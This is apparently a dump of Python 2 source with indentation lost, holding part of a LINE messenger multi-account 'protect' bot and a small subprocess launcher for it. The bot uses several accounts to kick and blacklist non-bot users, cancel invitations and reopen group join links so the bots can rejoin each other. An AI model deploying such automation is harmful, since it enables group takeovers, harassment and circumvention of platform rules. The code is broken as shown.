ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in ki4mid:
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
else:
G = ki4.getGroup(op.param1)
ki4.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki4.updateGroup(G)
elif op.param3 in kimid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
except:
pass
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open QR Kick finish-----#
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n|| " + Nama
wait2['ROM'][op.param1][op.param2] = "|| " + Nama
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
else:
cl.sendText
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT[14:] in ["10","20","30","40","50","00"]:
return False
else:
return True
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
_strkick_process.py
|
import subprocess, threading, sys, os, time
###
class Launcher(object):
def __init__(self, startcmd, stopcmd):
self.StartCmd = startcmd
self.StopCmd = stopcmd
self.SubProcess = None
self.Output = []
def CleanUp(self):
self.Stop()
def AssignButtons(self, startbtn, stopbtn, restartbnt):
self.StartBtn = startbtn
self.StopBtn = stopbtn
self.RestartBtn = restartbnt
def IsStarted(self):
if self.SubProcess is None: return False
if self.SubProcess.poll() is None: return True
#Perform cleaning
self.SubProcess.wait()
self.SubProcess = None
return False
def Tick(self):
#Check status ...
if self.IsStarted():
self.StartBtn.configure(state = "disabled")
self.StopBtn.configure(state = "normal")
self.RestartBtn.configure(state = "normal")
else:
self.StartBtn.configure(state = "normal")
self.StopBtn.configure(state = "disabled")
self.RestartBtn.configure(state = "disabled")
def Start(self):
if sys.platform == "win32":
kwargs = {}
else:
kwargs = {'close_fds':True}
print "Starting process", self.StartCmd
self.SubProcess = subprocess.Popen(self.StartCmd, shell=True, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
self.Output = []
t = threading.Thread(target=self._readerthread, args=('E', self.SubProcess.stderr))
t.setDaemon(True)
t.start()
t = threading.Thread(target=self._readerthread, args=('O', self.SubProcess.stdout))
t.setDaemon(True)
t.start()
def Stop(self):
if self.SubProcess is None: return
print "Stopping process", self.StopCmd
if self.StopCmd == 'KILL':
if sys.platform == "win32":
os.popen('taskkill /PID '+str(self.SubProcess.pid)+' /F /T')
else:
print 'kill ' + str(self.SubProcess.pid)
os.popen('kill ' + str(self.SubProcess.pid))
else:
os.popen(self.StopCmd)
self.SubProcess.wait()
self.SubProcess = None
def Restart(self):
self.Stop()
self.Start()
def PrintOutput(self):
print "====="
for s,l in self.Output:
print l
print "====="
def _readerthread(self, stype, handle):
try:
while self.SubProcess is not None:
buffer = handle.read()
if len(buffer) == 0:
time.sleep(0.5)
continue
self.Output.append((stype, buffer))
except:
print "!!!!! Exception in reader thread"
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.